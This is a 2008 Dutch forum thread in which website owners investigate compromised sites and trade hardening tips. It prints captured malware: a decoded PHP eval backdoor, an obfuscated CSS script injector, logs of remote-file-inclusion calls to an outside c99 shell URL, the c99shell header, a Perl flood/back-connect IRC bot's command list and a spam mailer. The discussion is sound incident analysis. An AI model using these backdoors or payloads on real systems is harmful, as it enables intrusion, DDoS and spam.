PD9waHAgZXJyb3JfcmVwb3J0aW5nKDEpO2dsb2JhbCAkSFRUUF9TRVJWRVJfVkFSUzsgZnVuY3Rpb24gc2F5KCR0KSB7IGVjaG8gIiR0XG4iOyB9OyBmdW5jdGlvbiB0ZXN0ZGF0YSgkdCkgeyBzYXkobWQ1KCJ0ZXN0ZGF0YV8kdCIpKTsgfTsgZWNobyAiPHByZT4iOyB0ZXN0ZGF0YSgnc3RhcnQnKTsgaWYgKG1kNSgkX1BPU1RbInAiXSk9PSJhYWNlOTk0MjhjNTBkYmU5NjVhY2M5M2YzZjI3NWNkMyIpeyBpZiAoJGNvZGUgPSBAZnJlYWQoQGZvcGVuKCRIVFRQX1BPU1RfRklMRVNbImYiXVsidG1wX25hbWUiXSwicmIiKSwkSFRUUF9QT1NUX0ZJTEVTWyJmIl1bInNpemUiXSkpeyBldmFsKCRjb2RlKTsgfWVsc2V7IHRlc3RkYXRhKCdmJyk7IH07IH1lbHNleyB0ZXN0ZGF0YSgncGFzcycpOyB9OyB0ZXN0ZGF0YSgnZW5kJyk7IGVjaG8gIjwvcHJlPiI7ID8+

staat na het door de base64 decoder het volgende:

PHP:
1

<?php error_reporting(1);global $HTTP_SERVER_VARS; function say($t) { echo "$t\n"; }; function testdata($t) { say(md5("testdata_$t")); }; echo "<pre>"; testdata('start'); if (md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3"){ if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],"rb"),$HTTP_POST_FILES["f"]["size"])){ eval($code); }else{ testdata('f'); }; }else{ testdata('pass'); }; testdata('end'); echo "</pre>"; ?>


lijkt alsof ie dat probeert uit te voeren ergens maar waar ben ik niet achter vanavond zal ik er thuis nog eens in duiken en kijken wat er precies gebeurt

Steam: Profile / Socialclub: Profile / Uplay: minedwarf / Origin: lordgandalf3

donderdag 15 mei 2008 18:41

Acties:
  • Sir_G-nius
  • Registratie: Mei 2005
  • Laatst online: 23-11 19:34

Sir_G-nius

- - -

Op de eerste plaats is het niet de bedoeling om je topic over te nemen. :)

Ik heb de laatste dagen ongeveer hetzelfde probleem met één van mijn websites.
Ik ben doormiddel van dit draadje ook mijn CSS-bestanden na gaan kijken, daar vond ik de volgende code helemaal onderin:
code:
1
2
3

a0b4df006e02184c60dbf503e71c87ad */ body { margin-top: expression(eval(unescape(
'%69%66%20%28%21%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%27%4A%53%53%53%27%29%29%7B%20%4A%53%53%31%20%3D%20%35%39%3B%20%4A%53%53%32%20%3D%20%31%32%39%34%35%32%32%3B%20%4A%53%53%33%20%3D%20%27%2F%77%65%62%65%64%69%74%2F%77%65%62%65%64%69%74%5F%74%65%6D%70%6C%61%74%65%73%2F%5F%74%65%6D%70%6C%61%74%65%5F%66%69%6C%65%73%2F%53%57%49%46%54%32%41%2F%69%76%65%64%69%71%2F%64%75%6D%6D%79%2E%68%74%6D%27%3B%20%76%61%72%20%6A%73%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%73%72%63%27%2C%20%27%2F%77%65%62%65%64%69%74%2F%77%65%62%65%64%69%74%5F%74%65%6D%70%6C%61%74%65%73%2F%5F%74%65%6D%70%6C%61%74%65%5F%66%69%6C%65%73%2F%53%57%49%46%54%32%41%2F%69%76%65%64%69%71%2F%63%68%65%63%6B%2E%6A%73%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%69%64%27%2C%20%27%4A%53%53%53%27%29%3B%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%27%68%65%61%64%27%29%2E%69%74%65%6D%28%30%29%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%6A%73%29%20%7D%3B%20'))) } /* a995d2cc661fa72452472e9554b5520c 
*/


Ik vroeg mezelf af of dit ook kan gebeuren door een niet goed beveiligd contact-formulier?

donderdag 15 mei 2008 19:16

Acties:
  • lordgandalf
  • Registratie: Februari 2002
  • Laatst online: 25-11 15:05

lordgandalf

dat kan men kan code injection te doen via een niet goed validerend formulier data op je server plaatsen

Steam: Profile / Socialclub: Profile / Uplay: minedwarf / Origin: lordgandalf3

donderdag 15 mei 2008 19:21

Acties:
  • Sir_G-nius
  • Registratie: Mei 2005
  • Laatst online: 23-11 19:34

Sir_G-nius

- - -

Het hosting bedrijf vertelde mij juist dat dat alleen mogelijk was via een niet goed beveiligd upload script..

Morgen is contact met ze opnemen.

P.s. Ben ook al een tijdje de logs aan het nalopen waar heel veel activiteit in is naar pagina's die niet eens bestaan, laat staan de mappen :?
code:
1
2
3
4
5
6
7
8

64.1.215.165 - - [15/May/2008:19:07:25 +0200] "GET /shopping/recreation/whistler-clothing.php HTTP/1.0" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuill.com/twiceler/robot.html)"
220.181.38.169 - - [15/May/2008:19:09:08 +0200] "GET / HTTP/1.1" 200 8399 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
124.83.159.152 - - [15/May/2008:19:11:26 +0200] "GET /shopping/recreation/camo-t-shirts.php HTTP/1.1" 404 - "-" "DoCoMo/2.0 SH902i (compatible; Y!J-SRD/1.0; http://help.yahoo.co.jp/help/jp/search/indexing/indexing-27.html)"
124.83.159.242 - - [15/May/2008:19:11:43 +0200] "GET /shopping/recreation/radley-black-grey-grab-handle-handbag-tags.php HTTP/1.1" 404 - "-" "DoCoMo/2.0 SH902i (compatible; Y!J-SRD/1.0; http://help.yahoo.co.jp/help/jp/search/indexing/indexing-27.html)"
124.83.159.228 - - [15/May/2008:19:12:07 +0200] "GET /shopping/recreation/pentax-rifle-scope.php HTTP/1.1" 404 - "-" "DoCoMo/2.0 SH902i (compatible; Y!J-SRD/1.0; http://help.yahoo.co.jp/help/jp/search/indexing/indexing-27.html)"
119.63.193.27 - - [15/May/2008:19:14:10 +0200] "GET /shopping/general_merchandise/gift-ideas-for-13-year-old-girl.php HTTP/1.1" 404 - "-" "Baiduspider+(+http://help.baidu.jp/system/05.html)"
209.19.152.70 - - [15/May/2008:19:17:51 +0200] "GET /shopping/recreation/breitling.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040225 Firefox/0.8"
209.19.152.65 - - [15/May/2008:19:17:51 +0200] "GET /shopping/recreation/breitling.php HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 4.0) Opera 7.0 [en]"

[ Voor 85% gewijzigd door Sir_G-nius op 15-05-2008 19:40 ]

donderdag 15 mei 2008 21:29

Acties:
  • lordgandalf
  • Registratie: Februari 2002
  • Laatst online: 25-11 15:05

lordgandalf

ik heb de code gedecode voor je Ron43 en het is nog een graadje erger dan dat je dacht.
het script checked niet of je server vatbaar is maar hij probeert php code uit te voeren !!

http://lordgandalf.kicks-ass.net/got/hack.txt

Steam: Profile / Socialclub: Profile / Uplay: minedwarf / Origin: lordgandalf3

donderdag 15 mei 2008 22:12

Acties:
  • DrClaw
  • Registratie: November 2002
  • Laatst online: 15-10 14:49

DrClaw

lullig allemaal :(

ik heb ook wel eens te maken gehad met gehackte sites, omdat we een server voor hosting aanbieden waar je een redelijk grote vrijheid van software installeren op hebt. Maar je leert ervan.

* de eerste stap die ik je kan adviseren is, om je base install van je website, als ie net gloedjenieuw is, een andere ownership te geven dan de webserver. liefst met een nieuwe user, die ook nog eens geen shell access heeft. [ chown -R raphael:www /var/www/houtduif/bla/* ]

* dan zou ik de hele install readonly maken, behalve dan die directories die echt write access moeten hebben voor plaatjes of pdf ofzo. het liefst migreer je die schrijfbare directories naar een locatie die niet toegankelijk is vanaf het web, behalve dan via je upload.php en een display.php?file=blabla bijvoorbeeld. [ chmod -R og-w+r /var/www/houtduif/bla/* ]

* je webserver zelf retourneert natuurlijk nooit error code of geeft zelfs maar een versienummer terug. heel misschien alleen voor 127.0.0.1 als je dat zo configureert. Zelf geef ik een versienummer terug van een paar versies terug, maar mn installs zijn up to date. Dan bijten de bots zich kapot op die bepaalde versie maar ja, de exploits zijn dan al gefixt (hoop ik). php geeft ook geen foutcodes terug, en al je pakketjes zoals phpmyadmin of whatever die php infopagina's genereren .. deactiveren.

* als je helemaal paranoid bent, rsync je elke 5 minuten je homedir vanaf een veilige onbeschrijfbare NFS mount bijvoorbeeld. maar ja, beter is het om je gaten te dichten.

* tmp directories of beschrijfbare plekken op je webserver zijn noexec gemount

* je houdt sites zoals http://www.milw0rm.com/ in de gaten

* je houdt de home sites van AL je geinstalleerde pakketten in de gaten, en als ze met een melding van een exploit komen: fixen

* van alle stukjes php-code die je eventueel zelf hebt geschreven, voer je een mooi stukje code uit wat ik heb gevonden via tweakers van de spelletjesgod oisyn: http://www.oisyn.nl/articles.php/14

[ Voor 7% gewijzigd door DrClaw op 15-05-2008 22:16 . Reden: wat dingetjes toegevoegd ]

vrijdag 16 mei 2008 08:52

Acties:
  • lordgandalf
  • Registratie: Februari 2002
  • Laatst online: 25-11 15:05

lordgandalf

Sir-G-nius jouw code heb ik ff unescaped online en dan krijg je het volgende

JavaScript:
1
2
3
4
5
6
7
8

if (!document.getElementById('JSSS')){ 
   JSS1 = 59; 
   JSS2 = 1294522; 
   JSS3 = '/webedit/webedit_templates/_template_files/SWIFT2A/ivediq/dummy.htm'; 
   var js = document.createElement('script'); 
   js.setAttribute('src', '/webedit/webedit_templates/_template_files/SWIFT2A/ivedi/check.js');    
  js.setAttribute('id', 'JSSS'); 
  document.getElementsByTagName('head').item(0).appendChild(js) };


als hij geen element vind met de naam JSSS dan zet ie twee getallen die nodig zijn voor het script gok ik en een templatefile. daarna creeerd ie een script element dat is volgens mij <script></script> en zet de source naar dat check.js en de id JSSS en dan voegt ie aan de head het laden van het script toe.
Heb je toevallig een check.js dan zouw ik die graag ontvangen van je ben wel benieuwd wat daarin gebeurt

DrClaw begrijp dat stukje code niet wat dat verbeterd okee het unescaped iets maar verders begrijp ik er weinig van :S

[ Voor 35% gewijzigd door lordgandalf op 22-05-2008 09:35 ]

Steam: Profile / Socialclub: Profile / Uplay: minedwarf / Origin: lordgandalf3

vrijdag 16 mei 2008 09:49

Acties:
  • Sir_G-nius
  • Registratie: Mei 2005
  • Laatst online: 23-11 19:34

Sir_G-nius

- - -

Bedankt ndeleeuw! :)

Ik heb gister alle 'geinfecteerde' bestanden van de webserver afgehaald en even lokaal bewaard.
Zelf maak ik geen gebruik van een check.js, maar kan even kijken of het in één van die aangemaakte mappen staat.

Ik laat het weten.

Edit:
Ik heb gekeken, maar ik kan geen ckeck.js vinden, zowel niet in de huidige als in de oude bestanden.

Heb ondertussen ook een robot.txt aangemaakt en heb nu al heel wat minder activiteit in m'n log files. Op het moment ziet het er allemaal goed uit.

Ik weet wel dat ik paar weken geleden een slecht (test)contactformulier had. Deze is toen ook misbruikt. Dat contactformulier heb ik toen aangepast. Kan het zijn dat toen al de .htaccess besmet was en het daardoor steeds terug kwam? (Had toen de .htaccess niet gecontroleerd)

[ Voor 51% gewijzigd door Sir_G-nius op 16-05-2008 09:55 ]

vrijdag 16 mei 2008 10:52

Acties:
  • lordgandalf
  • Registratie: Februari 2002
  • Laatst online: 25-11 15:05

lordgandalf

hmm denk niet dat het met je htaccess te maken heeft gehad of hij moet verkeerd zijn geweest en dus iedereen toe hebben gelaten.
jammer van die check.js had graag geweten wat het deed.
hmmz denk dat ze dan via dat contact formulier door middel van code injection een bestand hebben geplaatst wat hun toegang verschafte tot je server en zo binnen zijn gekomen keer op keer.
wat je kunt doen is alle bestanden een md5 hash te maken van de oude bestanden en deze te verfieren met de nieuwe bestanden en zo te kijken welke files zijn aan gepast.
ben benieuwd wat er allemaal is verandert en dan kun je als je linux gebruikt met een diff checken wat er precies is verandert.
zouw de besmette bestanden wel eens willen bekijken om te zien wat er verandert is

maar die aanval van jouw lijkt erg op deze aanval
http://www.security.nl/ar...grootschalige_aanval.html

[ Voor 8% gewijzigd door lordgandalf op 16-05-2008 11:06 ]

Steam: Profile / Socialclub: Profile / Uplay: minedwarf / Origin: lordgandalf3

vrijdag 16 mei 2008 10:58

Acties:
  • Sir_G-nius
  • Registratie: Mei 2005
  • Laatst online: 23-11 19:34

Sir_G-nius

- - -

Ik heb alle bestanden bekeken (website is niet zó groot ;)), maar het zijn echt alleen de CSS en de JS-bestanden die aangepast zijn. Daarrin staat dan dezelfde code als die ik in de .htaccess tegen kwam.

Dan zullen ze waarschijnlijk vanuit die pagina's te werk gegaan zijn die ze zelf erop hebben kunnen zetten.
Vond toen der tijd wel een of ander vaag e-mail scriptje (in een soort Russische taal). Dit bestand heb ik helaas niet meer, want deze is toen verwijderd door het hosting bedrijf.

Edit:
Ik zie nu dat het een beetje op slow-chat begint te lijken.. :X

[ Voor 7% gewijzigd door Sir_G-nius op 16-05-2008 10:59 ]

vrijdag 16 mei 2008 22:10

Acties:
  • Sir_G-nius
  • Registratie: Mei 2005
  • Laatst online: 23-11 19:34

Sir_G-nius

- - -

Net zat ik nog even te kijken via FTP op m'n website, en daar zag ik inees weer een tweetal PHP-bestanden staat die ik daar nooit heb neer gezet.
Het gaat om de bestanden genaamd 'james.php' en 'nep.txt'

Gelijk toen ik die deze zag heb ik ze geknipt en geplakt naar mijn lokale PC en via FTP verwijderd.
Daarna heb ik de log door gekeken waar ik een hoop van de volgende regels tegen kwam:
code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

91.186.10.10 - - [16/May/2008:17:24:54 +0200] "GET /index.php?lang=http://bouble-tete.awardspace.com/shell/c99.txt? HTTP/1.0" 200 43964 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
91.186.10.10 - - [16/May/2008:17:25:06 +0200] "GET /css/layout.css HTTP/1.0" 200 536 "http://browema.nl/index.php?lang=http://bouble-tete.awardspace.com/shell/c99.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
91.186.10.10 - - [16/May/2008:17:25:13 +0200] "GET /images/flag_nl1.jpg HTTP/1.0" 304 - "http://browema.nl/index.php?lang=http://bouble-tete.awardspace.com/shell/c99.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
91.186.10.10 - - [16/May/2008:17:25:15 +0200] "GET /images/flag_en1.jpg HTTP/1.0" 304 - "http://browema.nl/index.php?lang=http://bouble-tete.awardspace.com/shell/c99.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
91.186.10.10 - - [16/May/2008:17:25:16 +0200] "GET /images/flag_f1.jpg HTTP/1.0" 304 - "http://browema.nl/index.php?lang=http://bouble-tete.awardspace.com/shell/c99.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
91.186.10.10 - - [16/May/2008:17:25:18 +0200] "GET /images/flag_d1.jpg HTTP/1.0" 304 - "http://browema.nl/index.php?lang=http://bouble-tete.awardspace.com/shell/c99.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
91.186.10.10 - - [16/May/2008:17:25:19 +0200] "GET /images/blank.gif HTTP/1.0" 304 - "http://browema.nl/index.php?lang=http://bouble-tete.awardspace.com/shell/c99.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
91.186.10.10 - - [16/May/2008:17:25:21 +0200] "GET /index.php?lang=http%3A%2F%2Fbouble-tete.awardspace.com%2Fshell%2Fc99.txt%3F&act=img&img=back HTTP/1.0" 200 5469 "http://browema.nl/index.php?lang=http://bouble-tete.awardspace.com/shell/c99.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
91.186.10.10 - - [16/May/2008:17:25:23 +0200] "GET /index.php?lang=http%3A%2F%2Fbouble-tete.awardspace.com%2Fshell%2Fc99.txt%3F&act=img&img=up HTTP/1.0" 200 5549 "http://browema.nl/index.php?lang=http://bouble-tete.awardspace.com/shell/c99.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
91.186.10.10 - - [16/May/2008:17:25:26 +0200] "GET /index.php?lang=http%3A%2F%2Fbouble-tete.awardspace.com%2Fshell%2Fc99.txt%3F&act=img&img=refresh HTTP/1.0" 200 5550 "http://browema.nl/index.php?lang=http://bouble-tete.awardspace.com/shell/c99.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
91.186.10.10 - - [16/May/2008:17:25:29 +0200] "GET /index.php?lang=http%3A%2F%2Fbouble-tete.awardspace.com%2Fshell%2Fc99.txt%3F&act=img&img=search HTTP/1.0" 200 5600 "http://browema.nl/index.php?lang=http://bouble-tete.awardspace.com/shell/c99.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
91.186.10.10 - - [16/May/2008:17:25:42 +0200] "GET /index.php?lang=http%3A%2F%2Fbouble-tete.awardspace.com%2Fshell%2Fc99.txt%3F&act=img&img=home HTTP/1.0" 200 5559 "http://browema.nl/index.php?lang=http://bouble-tete.awardspace.com/shell/c99.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
91.186.10.10 - - [16/May/2008:17:26:09 +0200] "GET /images/menu/blank1.gif HTTP/1.0" 304 - "http://browema.nl/index.php?lang=http://bouble-tete.awardspace.com/shell/c99.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
91.186.10.10 - - [16/May/2008:17:26:11 +0200] "GET /index.php?lang=http%3A%2F%2Fbouble-tete.awardspace.com%2Fshell%2Fc99.txt%3F&act=img&img=small_dir HTTP/1.0" 200 5514 "http://browema.nl/index.php?lang=http://bouble-tete.awardspace.com/shell/c99.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
91.186.10.10 - - [16/May/2008:17:26:18 +0200] "GET /index.php?lang=http%3A%2F%2Fbouble-tete.awardspace.com%2Fshell%2Fc99.txt%3F&act=img&img=ext_diz HTTP/1.0" 200 6377 "http://browema.nl/index.php?lang=http://bouble-tete.awardspace.com/shell/c99.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
91.186.10.10 - - [16/May/2008:17:26:24 +0200] "GET /index.php?lang=http%3A%2F%2Fbouble-tete.awardspace.com%2Fshell%2Fc99.txt%3F&act=img&img=forward HTTP/1.0" 200 5469 "http://browema.nl/index.php?lang=http://bouble-tete.awardspace.com/shell/c99.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"


Daarna ben ik nog wat verder gaan zoeken in m'n log naar dat ip-adres en toen kwam ik het volgende tegen (het aanspreken van james.php):
code:
1
2
3
4
5

91.186.10.10 - - [16/May/2008:17:32:08 +0200] "GET /james.php?act=img&img=back HTTP/1.0" 200 119 "http://browema.nl/james.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
91.186.10.10 - - [16/May/2008:17:32:08 +0200] "GET /james.php?act=img&img=home HTTP/1.0" 200 209 "http://browema.nl/james.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
91.186.10.10 - - [16/May/2008:17:32:09 +0200] "GET /james.php?act=img&img=forward HTTP/1.0" 200 119 "http://browema.nl/james.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
91.186.10.10 - - [16/May/2008:17:32:11 +0200] "GET /james.php?act=img&img=refresh HTTP/1.0" 200 200 "http://browema.nl/james.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
91.186.10.10 - - [16/May/2008:17:32:15 +0200] "GET /james.php?act=img&img=search HTTP/1.0" 200 250 "http://browema.nl/james.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"


In het PHP-bestand james.php begon met het volgende (staat heel veel in, dus zal niet alles posten):
code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67

<?php
/*
******************************************************************************************************
*
*                   c99shell.php v.1.0 beta (?? 21.05.2005)
*                           Freeware license.
*                               © CCTeaM.
*  c99shell - ????-???????? ????? www-???????, "?????????" ??? ??????.
*  ?? ?????? ????????? ??????? ????????? ?????? ?? ???????? ????????? ????????:
   http://ccteam.ru/releases/c99shell
*
*  WEB: http://ccteam.ru
*  ICQ UIN #: 656555
* 
*  ???????????:
*  + ?????????? ?????????? ? ?????????? (ftp, samba *) ???????/???????, ??????????
*    ??????????? ?????????? ?????? ? ?????
*    (?????????????? ?????????????/??????????????? ????? tar *)
*    ??????????? ????? (???????? ?????? ??????)
*    modify-time ? access-time ? ?????? ?? ???????? ??? ?????????????? (????./???. ?????????? $filestealth)
*  + ??????????? SQL-???????? ?? ?????????? phpmyadmin,
     ????????/????????/?????????????? ??/??????, ???????? ?????? ????? ????? ? mysql
*  + ?????????? ?????????? unix-??????.
*  + ??????? (?????? ???????????) ?????????? shell-?????? (????? ???????, ????? ?????????????)
*  + ?????????? ????????????? PHP-????
*  + ?????????? ?????? ????? md5, unix-md5, sha1, crc32, base64
*  + ??????? ????????? ?????? ???????????? ??
*  + ??????? ftp-???????????? ?? ?????? login;login ?? /etc/passwd (?????? ???? ?????? ? 1/100 ?????????)
*    ???????????? ?????, ??????????, ????????? ???????? ??? ??/?????????, ?????????? ?????????? SQL)
*  + ?????? "?????" include: ????????????? ???? ?????????? ? ????????????? ? ????????? ?? ? ?????? (?????????)
     ????? ????? ???????? $surl (??????? ??????) ??? ????? ???????????? (?????????????) ??? ? ????? cookie "c99sh_surl",
     ???? ????-?????? ???????? $set_surl ? cookie "set_surl"
*  + ??????????? "?????????" /bin/bash ?? ???????????? ???? ? ???????????? ???????,
*    ??? ??????? back connect (???????????? ???????????? ??????????, ? ????????? ????????? ??? ??????? NetCat).
*  + ??????????? ???????? ????-???????? ???????
*  + ????????????????? ???????? ????????? ? ???????????? ? ????????? ?????? (????? mail())

*  * - ????? ????????? ??????? ?? ???????????? PHP
*
*   ? ????? ????? ??????? ??? ???!
*
*   ????????? ?????????:
*  ~ ???????? sql-?????????
*  ~ ?????????? ??????????? ?????????? ??????
*
*  ~-~ ?????? ??? ???? ???????? ????????????, ???????? ?????????? ? ?????????? (???? ? ????? ??????????????!)
       ? ICQ UIN #656555 ???? ????? ?????? "feedback", ????? ??????????? ??? ??????????? ? ?????????.
*
*  Last modify: 21.05.2005
*
*  © Captain Crunch Security TeaM. Coded by tristram
*
******************************************************************************************************
*/

//Starting calls
if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
error_reporting(5);
@ignore_user_abort(true);
@set_magic_quotes_runtime(0);
@set_time_limit(0);
$win = strtolower(substr(PHP_OS, 0, 3)) == "win";
if (!@ob_get_contents()) {@ob_start(); @ob_implicit_flush(0);}
define("starttime",getmicrotime());
if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}
$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}


In nep.txt vond ik het volgende:
code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42

#!/usr/bin/perl
#
# What is New in V2.0 ? :
# 
# + Improved Scanner
# + Improved Configuration
# + Nmap PortScan
# + LogCleaner
# + Mailer
#
#You can use the following commands :
#!track @portscan <ip>
#!track @nmap <ip> <beginport> <endport>
#!track @back <ip><port> 
#!track @udpflood <ip> <packet size> <time>
#!track @tcpflood <ip> <port> <packet size> <time>
#!track @httpflood <site> <time>
#!track @linuxhelp
#!track @fedex <vuln> <dork>
#!track @system
#!track @milw0rm
#!track @logcleaner
#!track @sendmail <subject> <sender> <recipient> <message>
#!track @join <#channel> 
#!track @part <#channel>
#!track @help
#!track cd tmp for example
#!track !eval <code= for example :@nickname>
#
#
########################################################################################################################
# ______   __              ___    _   __    ___          __   __                                                       #
#/_  __/  / /  ___        / _ \  (_) / /_  / _ ) __ __  / /  / /                                                       #
# / /    / _ \/ -_)      / ___/ / / / __/ / _  |/ // / / /  / /                                                        #
#/_/    /_//_/\__/      /_/    /_/  \__/ /____/ \_,_/ /_/  /_/                                                         #
#                                                                                                                      #
########################################################################################################################
######################
use HTTP::Request;
use LWP::UserAgent;
######################
my $processo = '/usr/sbin/apache -D SSL';


Ondertussen heb ik scripts beter beveiligd door te controleren op vaste waardes en niet alleen op '\' enz.

Ik heb nog op internet gezocht naar C99shell. Er is genoeg over te vinden, de pagina james.php had ik nog geopend en het zag er zo uit (link) (p.s. niet mijn pagina).

Ik hoop dat ik er nu geen last meer van heb.. De komende dagen iedergeval goed de logs in de gaten houden.

Eventueel kan ik de complete bestanden via e-mail of MSN versturen..

zondag 18 mei 2008 17:06

Acties:
  • lordgandalf
  • Registratie: Februari 2002
  • Laatst online: 25-11 15:05

lordgandalf

aha dus en gevalletje van een web shell die zijn altijd een pain in the ass.
zie niet wat nep.txt precies doet er staat code in maar verders weinig

EDIT:

het lijkt dat nep.txt een soort van portscanner techniek bevat om andere servers aan te vallen

[ Voor 26% gewijzigd door lordgandalf op 20-05-2008 08:28 ]

Steam: Profile / Socialclub: Profile / Uplay: minedwarf / Origin: lordgandalf3

donderdag 22 mei 2008 01:25

Acties:

Verwijderd

Topicstarter
Je neemt het draadje niet over hoor :p
Ik vind het bijzonder prettig dat mensen elkaar hier op deze wijze helpen. Dus join tha club.

Bij mij is nu al een poosje de ellende weggebleven. Wel zie ik om de 3 a 4 dagen een groot aantal pogingen langskomen om via mijn oude lek (dat allang dicht is) alsnog weer scripts uit te voeren. Veelal scripts op andere websites die op zich niet verdacht lijken. Aan de url zie je dat ook op die websites kennelijk een directory is aangemaakt waarin zich soortgelijke scripts bevinden als eerder hier beschreven. Het lijkt dan ook om een bot te gaan die op gezette tijden even een aanval waagt, maar er niet meer in slaagt.

Wel heb ik inmiddels ALLE formulierachtige zaken op de website vane en captcha code voorzien om het nog weer een ietsje moeilijker te maken voor de botjes.

donderdag 22 mei 2008 01:39

Acties:

Verwijderd

Topicstarter
lordgandalf schreef op donderdag 15 mei 2008 @ 21:29:
ik heb de code gedecode voor je Ron43 en het is nog een graadje erger dan dat je dacht.
het script checked niet of je server vatbaar is maar hij probeert php code uit te voeren !!

http://lordgandalf.kicks-ass.net/got/hack.txt
Klopt, en dat probeerde men ook via de kleine fout in de aanroepcode van mijn pagina's. Dat is nu geblokt.
Overigens heb ik de pagina's voorzien van een kenmerk dat overeen moet komen met een kenmerk in een databasetabel, alleen als dat na versleuteling dezelfde waarden geeft wordt een pagina uitgevoerd.

Verder heb ik ook een bestand genaamd vivo.php gevonden dat er niet thuishoort. Daarin stond het volgende
<title> inb0x H0tmAil.c0M </title>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<?php

set_time_limit(0);

if($manda)
{
//EMAIL DO DESTINAT?RIO
$destinatario = "$remetente";

//ASSUNTO DO EMAIL
$assunto = "$assunto";

//MENSAGEM DO EMAIL
$mensagem = $html;
$mensagem = stripslashes($mensagem);
//CABE?ALHO DO EMAIL
$headers = "MIME-Version: 1.0\r\n";
$headers .= "Content-type: text/html; charset=iso-8859-1\r\n";
/* headers adicionais */
$headers .= "From: $remetente>\r\n";
$headers .= "Cc: $remetente\r\n";
$headers .= "Bcc: e$remetente\r\n";

//ARQUIVO COM OS EMAILS
$arquivo = $lista;

//LENDO ARQUIVO
$file = explode("\n", $arquivo);
$i = 1;


?>
<p> </p>
<?
if($manda) { ?>
<table width="59%" height="30" border="0" align="center" cellpadding="2" cellspacing="1" bgcolor="#333333">
<tr>
<td bgcolor="#f5f5f5">
<?
foreach ($file as $mail) {

if(mail($mail, $assunto, $mensagem, $headers))

echo "<font color=red face=tahoma size=1>* $i - ".$mail."</font> <font color=red face=tahoma size=1>OK - Sended<b>
;</b></font><b><font color=pink face=tahoma size=1>)</font></b> <font color=red face=tahoma size=1> by
3133</font><b><font color=pink face=tahoma size=1>7</font></b><br>";

else

echo "* $i ".$email[$i]." <font color=yellow><b>NO</b> - 

Não Presta joga fora!</font><br><hr>";

$i++;


}
}
?>
</td>
</tr>
</table><? } ?>
<form name="form1" method="post" action="">
<table width="47%" height="202" border="0" align="center" cellpadding="0" cellspacing="2" bgcolor="#999999">
<tr>
<td bgcolor="#FFFFFF"><table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td colspan="3" bgcolor="#FFFFFF"> <div align="center"> </div></td>

</tr>
<tr>
<td width="21%"><div align="center"><font color="#4A0000"><b><font size="2" face="tahoma, Arial, Helvetica, sans-serif">Assunto:</font></b></font></div></td>
<td width="1%" bgcolor="#999999"> </td>
<td width="78%"><input name="assunto" type="text" id="assunto3" value="VIVO foto torpedo." size="50"></td>
</tr>
<tr>
<td><div align="center"><font color="#4A0000"><b><font size="2" face="tahoma, Arial, Helvetica, sans-serif">Remetente:</font></b></font></div></td>
<td bgcolor="#999999"> </td>

<td><input name="remetente" type="text" id="remetente3" value="<xxxx9831@torpedo.vivo.com.br" size="20"></td>
</tr>
<tr>
